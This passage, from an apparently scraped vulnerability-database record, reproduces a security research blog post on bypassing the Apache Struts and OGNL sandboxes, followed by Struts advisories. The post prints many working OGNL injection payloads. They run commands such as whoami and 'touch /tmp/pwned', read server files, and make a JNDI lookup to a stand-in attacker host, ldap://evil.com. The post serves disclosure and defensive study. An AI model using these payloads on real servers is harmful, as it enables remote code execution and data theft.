Fortunately for us, [OGNL replaces Java unicode escapes](<https://github.com/apache/commons-ognl/blob/master/src/main/jjtree/ognl.jjt#L36-L37>) while lexing the expression, so we were able to use the final payload:\n \n \n \n (#@org.apache.commons.beanutils.BeanMap@\\u007b\\u007d).(setBean(''),get('cla'+'ss').forName('javax'+'.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('7*7'))\n \n \n\nI submitted these bypasses to Atlassian through its bug bounty program and, even though I was not reporting any new OGNL injections but a bypass of its sandbox, they were kind enough to award me a $3,600 bounty!\n\n## Looking into Struts2\n\nAs mentioned before, a friend found what he thought was a Server-Side Template Injection (SSTI) (`%{7*7}` => 49) but it turned out to be an OGNL injection. Since this happened as part of a bug bounty program, I didn\u2019t have access to the source code. I can't be sure if the developers were passing untrusted data to an OGNL sink (for example, [`ActionSupport.getText()`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionSupport.html#getText-java.lang.String->)), or if it was one of the [unfixed double evaluation issues](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>) (still working at the time of writing). Anyhow, the application seemed to be using the latest Struts version and known payloads were not working. I decided to take a deeper look.\n\n### New gadgets on the block\n\nWhen I listed what objects were available I was surprised to find that many of the usual objects in the Struts OGNL context, such as the value stack, were not there, and some others I hadn't seen before were available. 
One such object was `#request['.freemarker.TemplateModel']`. This object turned out to be an instance of `org.apache.struts2.views.freemarker.ScopesHashModel` containing a variety of new objects. One of them (stored under the `ognl` key) gave me access to an `org.apache.struts2.views.jsp.ui.OgnlTool` instance. Looking at the code for this class I quickly spotted that it was calling `Ognl.getValue()`. `Ognl` belongs to the OGNL library, not to Struts, so the Struts sandbox (its `MemberAccess` policy) was not applied! In order to exploit it I used the following payload:\n \n \n \n #request['.freemarker.TemplateModel'].get('ognl').getWrappedObject().findValue('(new freemarker.template.utility.Execute()).exec({\"whoami\"})', {})\n \n \n\nThat was enough to get the issue accepted as a remote code execution in the bounty program. However, despite having achieved RCE, there were a few unsolved questions:\n\n * Why was this `.freemarker.TemplateModel` object available?\n * Are there any other ways to get RCE on the latest Struts versions?\n\n### Post-invocation Context\n\nAttackers are limited to the objects they are able to access. 
Normally, OGNL injections take place before the action invocation completes and the action\u2019s `Result` is rendered.\n\n[figure: Struts2 architecture diagram, https://struts.apache.org/core-developers/attachments/Struts2-Architecture.png]\n\nWhen grepping the Struts source code for `.freemarker.TemplateModel`, I found out that there are plenty of new objects added to the request scope when preparing the action\u2019s `Result` in order to share them with the view layer (JSP, FreeMarker or Velocity), and `.freemarker.TemplateModel` was [one of them](<https://github.com/apache/struts/blob/266d2d4ed526edbb8e8035df94e94a1007d7c360/core/src/main/java/org/apache/struts2/views/freemarker/FreemarkerManager.java#L122>). However, those objects are only added after the `ActionInvocation` has been invoked. This implies that if I find `.freemarker.TemplateModel` in the request scope, my injection was evaluated after the action invocation finished building the action\u2019s `Result` object and, therefore, my injection probably did not take place as part of the Struts code but as a [double evaluation in the FreeMarker template](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>).\n\nThese new objects will offer new ways to get remote code execution, but only if you are lucky enough to get your injection evaluated after the action\u2019s `Result` has been built. Or not? \n\nIt turned out that the ongoing `ActionInvocation` object can be accessed through the OGNL context and, therefore, we can use it to force the building of the `Result` object in advance. Calling the `Result`\u2019s `doExecute()` method will trigger the population of the so-called template model. For example, for FreeMarker, `ActionInvocation.createResult()` will create a `FreemarkerResult` instance. 
Calling its `doExecute()` method will, in turn, call its [`createModel()`](<https://github.com/apache/struts/blob/266d2d4ed526edbb8e8035df94e94a1007d7c360/core/src/main/java/org/apache/struts2/views/freemarker/FreemarkerResult.java#L273>) method, which populates the template model.\n \n \n \n (#ai=#attr['com.opensymphony.xwork2.ActionContext.actionInvocation'])+\n (#ai.setResultCode(\"success\"))+\n (#r=#ai.createResult())+\n (#r.doExecute(\"pages/test.ftl\",#ai))\n \n \n\nExecuting the above payload will populate the request context with new objects. However, that requires us to know the result code and the template\u2019s path. Fortunately, we can also invoke the `ActionInvocation.invoke()` method, which will take care of everything for us!\n \n \n \n #attr['com.opensymphony.xwork2.ActionContext.actionInvocation'].invoke()\n \n \n\nThe line above will result in the template model being populated and stored in the request and context scopes, regardless of where your injection takes place.\n\n### Wild objects appeared\n\nAfter the invocation, the request scope and value stack will be populated with additional objects. These objects vary depending on the view layer used. 
What follows is a list of the most interesting ones (skipping those which do not lead to RCE):\n\nFor FreeMarker:\n\n * `.freemarker.Request` (`freemarker.ext.servlet.HttpRequestHashModel`)\n * `.freemarker.TemplateModel` (`org.apache.struts2.views.freemarker.ScopesHashModel`) \n * `__FreeMarkerServlet.Application__` (`freemarker.ext.servlet.ServletContextHashModel`) \n * `JspTaglibs` (`freemarker.ext.jsp.TaglibFactory`)\n * `.freemarker.RequestParameters` (`freemarker.ext.servlet.HttpRequestParametersHashModel`)\n * `.freemarker.Application` (`freemarker.ext.servlet.ServletContextHashModel`) \n * `.freemarker.JspTaglibs` (`freemarker.ext.jsp.TaglibFactory`) \n * `ognl` (`org.apache.struts2.views.jsp.ui.OgnlTool`) \n * `stack` (`com.opensymphony.xwork2.ognl.OgnlValueStack`) \n * `struts` (`org.apache.struts2.util.StrutsUtil`) \n\nFor JSPs:\n\n * `com.opensymphony.xwork2.dispatcher.PageContext` (`PageContextImpl`)\n\nFor Velocity:\n\n * `.KEY_velocity.struts2.context` (`StrutsVelocityContext`) \n * `ognl` (`org.apache.struts2.views.jsp.ui.OgnlTool`)\n * `struts` (`org.apache.struts2.views.velocity.result.VelocityStrutsUtils`)\n\n### Getting RCE with new objects\n\nAnd now let\u2019s have some fun with these new objects! In the following section I will explain how I was able to leverage some of these objects to get remote code execution.\n\n#### ObjectWrapper\n\nThere may be different ways to get an instance of FreeMarker\u2019s `ObjectWrapper`, even if the application is not using FreeMarker as its view layer, because Struts uses it internally for rendering JSP tags. A few of them are listed below:\n\n * Through `freemarker.ext.jsp.TaglibFactory.getObjectWrapper()`. 
Even though Struts\u2019 sandbox forbids access to the `freemarker.ext.jsp` package, we can still access it using a `BeanMap`:\n \n \n \n (#a=#@org.apache.commons.collections.BeanMap@{ })+\n (#a.setBean(#application[\".freemarker.JspTaglibs\"]))+\n (#a['objectWrapper'])\n \n \n\n * Through `freemarker.ext.servlet.HttpRequestHashModel.getObjectWrapper()`:\n \n \n \n (#request.get('.freemarker.Request').objectWrapper)\n \n \n\n * Through `freemarker.core.Configurable.getObjectWrapper()`. We need to use the `BeanMap` trick to access it since `freemarker.core` is also blocklisted:\n \n \n \n (#a=#@org.apache.commons.collections.BeanMap@{ })+\n (#a.setBean(#application['freemarker.Configuration']))+\n #a['objectWrapper']\n \n \n\nNow for the fun part: what can we do with an `ObjectWrapper`? There are three interesting methods we can leverage to get RCE:\n\n**`newInstance(class, args)`**\n\nThis method will allow us to instantiate an arbitrary type. Arguments must be wrapped, but the return value is not. For example, we can trigger a JNDI lookup against an attacker-controlled server:\n \n \n \n objectWrapper.newInstance(@javax.naming.InitialContext@class,null).lookup(\"ldap://evil.com\")\n \n \n\nOr, if Spring libs are available, we can get RCE by supplying a malicious [XML config](<https://raw.githubusercontent.com/irsl/jackson-rce-via-spel/master/spel.xml>) to the `FileSystemXmlApplicationContext` constructor:\n \n \n \n objectWrapper.newInstance(@org.springframework.context.support.FileSystemXmlApplicationContext@class,{#request.get('.freemarker.Request').objectWrapper.wrap(\"URL\")})\n \n \n\n**`getStaticModels()`**\n\nThis method allows us to get static fields from arbitrary types. The returned object is wrapped in a FreeMarker `TemplateModel`, so we need to unwrap it. 
An example payload leveraging [Text4Shell](<https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/>):\n \n \n \n objectWrapper.staticModels.get(\"org.apache.commons.text.lookup.StringLookupFactory\").get(\"INSTANCE\").getWrappedObject().scriptStringLookup().lookup(\"javascript:3+4\")\n \n \n\n**`wrapAsAPI()`**\n\nThis method allows us to wrap any object with a `freemarker.ext.beans.BeanModel`, giving us indirect access to its getter and setter methods. Struts\u2019 sandbox has no visibility into these calls and therefore they can be used to call any blocklisted method.\n\n * `BeanModel.get('field_name')` returns a `TemplateModel` wrapping the field\u2019s value.\n * `BeanModel.get('method_name')` returns either a `SimpleMethodModel` or an `OverloadedMethodsModel` wrapping the method.\n\nWe can, therefore, call any blocklisted method with:\n \n \n \n objectWrapper.wrapAsAPI(blocked_object).get(blocked_method)\n \n \n\nThis call will return an instance of `TemplateMethodModelEx`. Its [`exec()`](<https://freemarker.apache.org/docs/api/freemarker/template/TemplateMethodModelEx.html#exec-java.util.List->) method is defined in the `freemarker.template` namespace and, therefore, trying to invoke this method will get blocked by the Struts sandbox. However, `TemplateMethodModelEx` is an interface, and what we will really get is an instance of either `freemarker.ext.beans.SimpleMethodModel` or `freemarker.ext.beans.OverloadedMethodsModel`. Since the `exec()` methods on both of them are defined in the `freemarker.ext.beans` namespace, which is not blocklisted, their invocation will succeed. As we saw before, arguments need to be wrapped. 
As an example, we can call `File.createTempFile(\"PREFIX\", \"SUFFIX\")` using the following payload:\n \n \n \n objectWrapper.getStaticModels().get(\"java.io.File\").get(\"createTempFile\").exec({objectWrapper.wrap(\"PREFIX\"), objectWrapper.wrap(\"SUFFIX\")})\n \n \n\nWe can achieve the same by calling `getAPI()` on any `freemarker.template.TemplateModelWithAPISupport` instance. Many of the objects FreeMarker exposes implement this interface and will allow us to wrap them with a `BeanModel`. For example, to list all the keys in the Struts Value Stack we can use:\n \n \n \n #request['.freemarker.TemplateModel'].get('stack').getAPI().get(\"context\").getAPI().get(\"keySet\").exec({})\n \n \n\nNote that `com.opensymphony.xwork2.util.OgnlContext.keySet()` would be blocked since it belongs to the `com.opensymphony.xwork2.util` namespace, but in this case Struts\u2019 sandbox will only see calls to `TemplateHashModel.get()` and `TemplateModelWithAPISupport.getAPI()`, which are both allowed.\n\nThe last payload will give us a complete list of all available objects in the Value Stack, many of which could be used for further attacks. 
Let's see a more interesting example by reading an arbitrary file using `BeanModel`s:\n \n \n \n (#bw=#request.get('.freemarker.Request').objectWrapper).toString().substring(0,0)+\n \n (#f=#bw.newInstance(@java.io.File@class,{#bw.wrap(\"C:\\\\REDACTED\\\\WEB-INF\\\\web.xml\")}))+ \n \n (#p=#bw.wrapAsAPI(#f).get(\"toPath\").exec({}))+\n \n (#ba=#bw.getStaticModels().get(\"java.nio.file.Files\").get(\"readAllBytes\").exec({#bw.wrap(#p)}))+\n \n \"----\"+\n \n (#b64=#bw.getStaticModels().get(\"java.util.Base64\").get(\"getEncoder\").exec({}).getAPI().get(\"encodeToString\").exec({#bw.wrap(#ba)}))\n \n \n\nOr listing the contents of a directory:\n \n \n \n (#bw=#request.get('.freemarker.Request').objectWrapper).toString().substring(0,0)+\n \n (#dir=#bw.newInstance(@java.io.File@class,{#bw.wrap(\"C:\\\\REDACTED\\\\WEB-INF\\\\lib\")}))+ \n \n (#l=#bw.wrapAsAPI(#dir).get(\"listFiles\").exec({}).getWrappedObject())+\"---\"+\n \n (#l.{#this})\n \n \n\n#### OgnlTool/OgnlUtil[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#ognltool-ognlutil>)\n\nThe `org.apache.struts2.views.jsp.ui.OgnlTool` class was calling `Ognl.getValue()` with no `OgnlContext`. Even though the OGNL library will take care of creating a default one, that default context will not include the additional security checks added by the Struts framework and is easily bypassable:\n \n \n \n package org.apache.struts2.views.jsp.ui;\n \n import ognl.Ognl;\n \n import ognl.OgnlException;\n \n import com.opensymphony.xwork2.inject.Inject;\n \n import com.opensymphony.xwork2.ognl.OgnlUtil;\n \n public class OgnlTool {\n \n private OgnlUtil ognlUtil;\n \n public OgnlTool() { }\n \n \n \n @Inject\n \n public void setOgnlUtil(OgnlUtil ognlUtil) {\n \n this.ognlUtil = ognlUtil;\n \n }\n \n \n \n public Object findValue(String expr, Object context) {\n \n try {\n \n // No OgnlContext is passed, so OGNL builds a default one without Struts' MemberAccess checks\n \n return Ognl.getValue(ognlUtil.compile(expr), context);\n \n } catch (OgnlException e) {\n \n return null;\n \n }\n \n }\n \n }\n \n \n\nWe can get an instance of `OgnlTool` from both
FreeMarker and Velocity post-invocation contexts:\n \n \n \n #request['.freemarker.TemplateModel'].get('ognl')\n \n \n\nOr\n \n \n \n #request['.KEY_velocity.struts2.context'].internalGet('ognl')\n \n \n\nFor FreeMarker\u2019s case, it will come up wrapped with a Template model but we can just unwrap it and use it to get RCE:\n \n \n \n (#a=#request.get('.freemarker.Request').objectWrapper.unwrap(#request['.freemarker.TemplateModel'].get('ognl'),'org.apache.struts2.views.jsp.ui.OgnlTool'))+\n \n (#a.findValue('(new freemarker.template.utility.Execute()).exec({\"whoami\"})',null))\n \n \n\nOr, even simpler:\n \n \n \n #request['.freemarker.TemplateModel'].get('ognl').getWrappedObject().findValue('(new freemarker.template.utility.Execute()).exec({\"whoami\"})',{})\n \n \n\n`OgnlTool` was [inadvertently fixed](<https://github.com/apache/struts/commit/5cd409d382e00b190bfe4e957c4167d06b8f9da1#diff-55821720c975d84350d796bec09aa366cc2b2861fb7e12f223cc5a4453b55640>) when Struts 6.0.0 was released by upgrading to OGNL 3.2.2 which always requires a `MemberAccess`. But the latest Struts 2 version (2.5.30) is still vulnerable to this payload.\n\n#### StrutsUtil[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#strutsutil>)\n\nAnother object that can be accessed in the post-invocation context is an instance of `org.apache.struts2.util.StrutsUtil`. 
There are plenty of interesting methods in here:\n\n * `public String include(Object aName)` can be used to read arbitrary resources:\n * `<struts_utils>.include(\"/WEB-INF/web.xml\")`\n * `public Object bean(Object aName)` can be used to instantiate arbitrary types:\n * `<struts_utils>.bean(\"javax.script.ScriptEngineManager\")`\n * `public List makeSelectList(String selectedList, String list, String listKey, String listValue)`\n * `listKey` and `listValue` are evaluated with `OgnlTool` and therefore in an unsandboxed context\n * `<struts_utils>.makeSelectList(\"#this\",\"{'foo'}\",\"(new freemarker.template.utility.Execute()).exec({'touch /tmp/bbbb'})\",\"\")`\n\nOn applications using Velocity as their view layer, this object will be an instance of `VelocityStrutsUtil`, which extends `StrutsUtil` and provides an additional vector:\n\n * `public String evaluate(String expression)` will allow us to evaluate a string containing a Velocity template:\n \n \n \n (<struts_utils>.evaluate(\"#set ($cmd='java.lang.Runtime.getRuntime().exec(\\\"touch /tmp/pwned_velocity\\\")') $application['org.apache.tomcat.InstanceManager'].newInstance('javax.script.ScriptEngineManager').getEngineByName('js').eval($cmd)\"))\n \n \n\n#### JspApplicationContextImpl[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#jspapplicationcontextimpl>)\n\nThe last vector that I wanted to share is one that I found a few years ago and that I was not able to exploit\u2013although I was pretty sure that there had to be a way. The newly discovered post-invocation objects finally made this possible!\n\nIf you have inspected the Struts Servlet context (`#application`) in the past, you probably saw an item with key `org.apache.jasper.runtime.JspApplicationContextImpl` which returned an instance of `org.apache.jasper.runtime.JspApplicationContextImpl`.
This class contains a method called `getExpressionFactory()` that returns an `ExpressionFactory`, which exposes a `createValueExpression()` method. This looks like a perfect place to create an EL expression and evaluate it. The problem was that [`createValueExpression`](<https://docs.oracle.com/javaee/7/api/javax/el/ExpressionFactory.html#createValueExpression-javax.el.ELContext-java.lang.String-java.lang.Class->) requires an instance of `ELContext` and we had none.\n\nFortunately, our post-invocation technique brought a new object into play. When using JSPs as the view layer, `#request['com.opensymphony.xwork2.dispatcher.PageContext']` will return an uninitialized `org.apache.jasper.runtime.PageContextImpl` instance that we can use to create an `ELContext` and evaluate arbitrary EL expressions:\n \n \n \n (#attr['com.opensymphony.xwork2.ActionContext.actionInvocation'].invoke())+\n \n (#ctx=#request['com.opensymphony.xwork2.dispatcher.PageContext'])+\n \n (#jsp=#application['org.apache.jasper.runtime.JspApplicationContextImpl'])+\n \n (#elctx=#jsp.createELContext(#ctx))+\n \n (#jsp.getExpressionFactory().createValueExpression(#elctx, '7*7', @java.lang.Class@class).getValue(#elctx))\n \n \n\nAvid readers may be wondering why Struts stores the `PageContext` in the request. Well, it turns out it does not, but we can access it through chained contexts.\n\nWhen accessing `#attr` (`AttributeMap`), [we can indirectly look into multiple scopes](<https://struts.apache.org/maven/struts2-core/apidocs/org/apache/struts2/util/AttributeMap.html>) such as the Page, Request, Session and Application (Servlet). But there is more: `org.apache.struts2.dispatcher.StrutsRequestWrapper.getAttribute()` will look for the attribute in the `ServletRequest` and, if it can't find it there, [it will search the value stack](<https://github.com/apache/struts/blob/master/core/src/main/java/org/apache/struts2/dispatcher/StrutsRequestWrapper.java#L94>)!
So, we can effectively access the value stack through the `#request` or `#attr` variables.\n\nIn this case, the `PageContext` was not stored in the request scope, but in the Value stack, and we are able to access it through chained context searches.\n\nWe can even run arbitrary OGNL expressions as long as they don\u2019t contain any hashes (`#`), for example, `#request[\"@java.util.HashMap@class\"]` will return the `HashMap` class.\n\n### Leveling up the BeanMap payload[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#leveling-up-the-beanmap-payload>)\n\nYou may already be familiar with McOwn\u2019s [technique](<https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html>). He realized that it was possible to use [OGNL Map notation](<https://commons.apache.org/proper/commons-ognl/language-guide.html>) to instantiate an `org.apache.commons.collections.BeanMap` by using the `#@org.apache.commons.collections.BeanMap@{ }` syntax, and then it was possible to wrap any Java object on this map and access any getters and setters as map properties. 
His payload was based on the `org.apache.tomcat.InstanceManager` payload we introduced at [Black Hat 2020](<https://i.blackhat.com/USA-20/Wednesday/us-20-Munoz-Room-For-Escape-Scribbling-Outside-The-Lines-Of-Template-Security-wp.pdf>) and looked like:\n \n \n \n (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n \n (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n \n (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n \n (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\n \n (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n \n (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n \n (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n \n (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n \n (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc.exe'}))\n \n \n\nThe payload was basically disabling the OGNL sandbox and then accessing otherwise blocked classes such as `InstanceManager`. 
There is a simpler way to abuse BeanMaps that does not require disabling the sandbox: using reflection:\n \n \n \n (#c=#@org.apache.commons.beanutils.BeanMap@{})+\n \n (#c.setBean(@Runtime@class))+\n \n (#rt=#c['methods'][6].invoke())+\n \n (#c['methods'][12]).invoke(#rt,'touch /tmp/pwned')\n \n \n\nThis payload also works in Struts 6 if the `BeanMap` class is available in the classpath (either from Apache Commons Collections or Apache Commons BeanUtils), but you need to specify the FQN (Fully Qualified Name) for `Runtime`: `@java.lang.Runtime@class`.\n\n### Timeline[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#timeline>)\n\nThese bypasses were first reported to the Struts and OGNL security teams on June 9, 2022.\n\nOn October 7, 2022, the security team replied to us and stated that improving the block lists was not a sustainable solution and, therefore, they decided to stop doing it. They highlighted that a [Java Security Manager can be configured](<https://struts.apache.org/security/#proactively-protect-from-ognl-expression-injections-attacks-if-easily-applicable>) to protect every OGNL evaluation from these attacks, and we highly recommend doing so if you are running a Struts application. However, bear in mind that the [Security Manager is deprecated](<https://openjdk.org/jeps/411>) and will soon get removed from the JDK.\n\n## That\u2019s a wrap[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#thats-a-wrap>)\n\nAt this point, you will have probably realized that sandboxing an expression language such as OGNL is a really difficult task, and may require maintaining a list of blocked classes and OGNL features even though that is not an optimal approach. In this blog post, we have reviewed a few ways in which these sandboxes can be bypassed.
Although they are specific to OGNL, hopefully you have learned to explore sandbox controls\u2013and one or two new tricks\u2013that may apply to other sandboxes. In total, we were able to raise $5,600, which we donated to [UNHCR](<https://www.unhcr.org/>) to help provide refuge for Ukrainians seeking protection from the war.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-01-27T16:00:49", "type": "github", "title": "Bypassing OGNL sandboxes for fun and charities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3087", "CVE-2016-4436", "CVE-2017-5638", "CVE-2018-11776", "CVE-2018-1327", "CVE-2020-17530", "CVE-2021-26084", "CVE-2022-26134"], "modified": "2023-01-27T13:33:03", "id": "GITHUB:0519EA92487B44F364A1B35C85049455", "href": "https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "jvn": [{"lastseen": "2023-06-06T15:21:12", "description": "Apache Struts 2 provided by The Apache Software Foundation contains a remote code execution vulnerability due to improper input validation 
([CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)).\n\n ## Impact\n\nA remote attacker may execute arbitrary code.\n\n ## Solution\n\n**Update the software** \nUpdate the software to the latest version according to the information provided by the developer. \n \n**Apply the workaround** \nDo not use forced OGNL evaluation in the tag's attributes based on untrusted/unvalidated user input. \nThe developer recommends that users follow the recommendations from the [Security Guide](<https://struts.apache.org/security/#do-not-use-incoming-untrusted-user-input-in-forced-expression-evaluation>).\n\n ## Products Affected\n\n * Apache Struts 2.0.0 to 2.5.25\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-11T00:00:00", "type": "jvn", "title": "JVN#43969166: Apache Struts 2 vulnerable to remote code execution (S2-061)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-04-18T00:00:00", "id": "JVN:43969166", "href": "http://jvn.jp/en/jp/JVN43969166/index.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": 
"2023-04-11T01:35:21", "description": "Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T22:51:56", "type": "osv", "title": "Remote code execution in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2023-04-11T01:35:18", "id": "OSV:GHSA-JC35-Q369-45PV", "href": "https://osv.dev/vulnerability/GHSA-jc35-q369-45pv", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-28T05:08:41", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": 
"3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-02T14:50:51", "type": "osv", "title": "Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2023-03-28T05:08:35", "id": "OSV:GHSA-WP4H-PVGW-5727", "href": "https://osv.dev/vulnerability/GHSA-wp4h-pvgw-5727", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T01:25:45", "description": "The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag\u2019s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. 
Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T00:00:30", "type": "osv", "title": "Expression Language Injection in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2021-31805"], "modified": "2023-04-11T01:25:42", "id": "OSV:GHSA-V8J6-6C2R-R27C", "href": "https://osv.dev/vulnerability/GHSA-v8j6-6c2r-r27c", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-06-07T13:50:22", "description": "Forced OGNL evaluation, when evaluated on raw user input in tag attributes,\nmay lead to remote code execution. 
